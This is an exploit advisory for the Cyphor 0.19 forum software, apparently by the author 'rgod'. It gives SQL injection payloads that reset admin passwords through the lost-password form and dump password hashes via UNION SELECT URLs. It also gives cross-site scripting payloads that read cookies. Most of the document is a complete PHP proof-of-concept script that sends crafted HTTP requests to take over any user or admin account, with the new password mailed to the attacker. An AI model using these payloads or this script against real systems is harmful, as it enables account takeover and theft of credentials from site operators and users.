Cyphor 0.19 SQL Injection / Board takeover / cross site scripting 1)if magic quotes off -> SQL Injection: by "Forgot your password?" feature you can send yourself a new admin password and reset it, poc: email: [your_email] nick: 'or'X'='X soon, you will receive an email like this: You have registered for a Cyphor forum (My Discussions). This is your confirmation. Your username is: 'or'X'='X Your password is: mixa-13b now you can go to Administration panel, create/edit/delete forums/group/users, you can insert evil javascript code in terms of usage or welcome message 2) SQL Injection II: to see table_prefix (usually "cyphor_") http://[target]/cyphor/newmsg.php?fid=' now you can see at screen admin password hash by this url: http://[target]/[path]/newmsg.php?fid=''%20UNION%20SELECT%20nick,%20password,%20null,%20null%20FROM%20[table_prefix]users%20/* (it is encrypted by cript() function with username as key, one way...but can try to bruteforce it) 3) xss (you can sql inject a javascript, it is showned at screen...): http://[target]/[path]/newmsg.php?fid=''%20UNION%20SELECT%20null,%20"<script>alert(document.cookie)</script>",%20null,%20null/* 4) xss II: http://[target]/[path]/include/footer.php?t_login=<script>alert(document.cookie)</script> mphhh... you see clear text password as I see? ;) and so on... a lot of uninitialized vars showned at screen in footer.php... this is my proof of concept exploit, with this you can have a new password for any user/admin: <?php # --- cyphor019_xpl.php 7.36 08/10/2005 # # # # Cyphor 0.19 ( possibly prior versions) SQL injection / board takeover # # # # by rgod # # site: http://rgod.altervista.org # # # # make these changes in php.ini if you have troubles # # to launch this script: # # allow_call_time_pass_reference = on # # register_globals = on # # # # usage: launch this script from Apache, fill requested fields, then # # send yourself any user / admin password right now! # # # # Sun Tzu: "There are five ways of attacking with fire. The first is to burn # # soldiers in their camp; the second is to burn stores; the third is to burn # # baggage trains; the fourth is to burn arsenals and magazines; the fifth is # # to hurl dropping fire amongst the opponent." # error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'<html><head><title>Cyphor 0.19 SQL Injection/board takeover </title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img {background-color: #FFFFFF !important} input {background-color: #303030 !important} option { background-color: #303030 !important} textarea {background-color: #303030 !important} input {color: #1CB081 !important} option {color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox {background-color: #303030 !important} select {font-weight: normal; color: #1CB081; background-color: #303030;} body {font-size: 8pt !important; background-color: #111111; body * {font-size: 8pt !important} h1 {font-size: 0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em !important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: normal !important} *{text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: underline; color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6"> Cyphor 0.19 (possibly prior versions) SQL injection / board takeover </p><p class="Stile6"> a script by rgod at <a href="http://rgod.altervista.org"; target="_blank"> http://rgod.altervista.org</a></p> <table width="84%"><tr> <td width="43%"><form name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path= value&host=value&port=value&username=value&proxy=value&your_email=value"> <p> <input type="text" name="host"><span class="Stile5"> hostname (ex: www.sitename. com)</span></p><p><input type="text" name="path"><span class="Stile5"> path (ex: /cyphor/ or /forum/ or just /)</span></p><p><input type="text" name="port"><span class="Stile5"> specify a port other than 80 (default value)</span></p><p><input type="text" name="username"><span class="Stile5">user whom you want the password ,admin? ;) </span> </p> <p> <input type="text" name="your_email"><span class="Stile5"> email where the password will be sent</span> </p> <p> <input type="text" name="proxy"><span class="Stile5"> send exploit through an HTTP prox y (ip:port) </span></p><p><input type="submit" name="Submit" value="go!"></p> </form></td></tr></table></body></html>'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo '<table border="0"><tr>'; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo "<td> </td>"; for ($li=0; $li<=15; $li++) { echo "<td>".$headeri[$li+$ki]."</td>"; } $ki=$ki+16; echo "</tr><tr>"; } if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else {echo "<td>".$datai."</td> ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo "<td>  </td>"; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo "<td>".$headeri[$li]."</td>"; } echo "</tr></table>"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.htmlentities($host).'...'; die; }} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } define('EMAIL_PREG', '#^[a-z0-9&\-_.\+]+?@[\w\-]+\.([\w\-\.]+\.)?[\w]+$#'); define('USER_PREG', '#^[A-Za-z0-9_\-]+$#'); if (($path<>'') and ($host<>'') and ($your_email<>'') and ($username<>'')) { if (!preg_match(EMAIL_PREG, $your_email)) {echo '<br>Need a valid email...'; die;} if (!preg_match(USER_PREG, $username)) {echo '<br>Need a valid username...'; die;} if ($port=='') {$port=80;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} #STEP 1 -> retrieve the table prefix... $packet="GET ".$p."show.php?fid=' HTTP/1.0 \r\n"; $packet.="User-Agent: GetRight/4.5xx\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); $temp=explode("SELECT * FROM ",$html); $temp2=explode("forums WHERE",$temp[1]); $table_prefix=trim($temp2[0]); echo '<br> Table prefix ->'.htmlentities($table_prefix); if ($table_prefix=='') {echo 'Exploit failed...'; die;} #STEP 2 -> send yourself a new password... $sql="') UNION SELECT * FROM ".$table_prefix."users WHERE nick='".$username."'/*"; $sql=urlencode($sql); $data="email=".urlencode($your_email)."&nick=".$sql."&submit=Submit"; $packet="POST ".$p."lostpwd.php HTTP/1.1\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.":".$port.$path."lostpwd.php\r\n";; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Internet Ninja x.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); if (eregi("New password sent.",$html)) {echo '<br>Exploit successful...check your email box...';} else {echo '<br>Exploit failed...';} } else { echo 'Fill in requested fields, optionally specify a proxy...'; } ?> rgod site: http://rgod.altervista.org mail: retrogod at aliceposta it original advisory: http://rgod.altervista.org/cyphor019.html
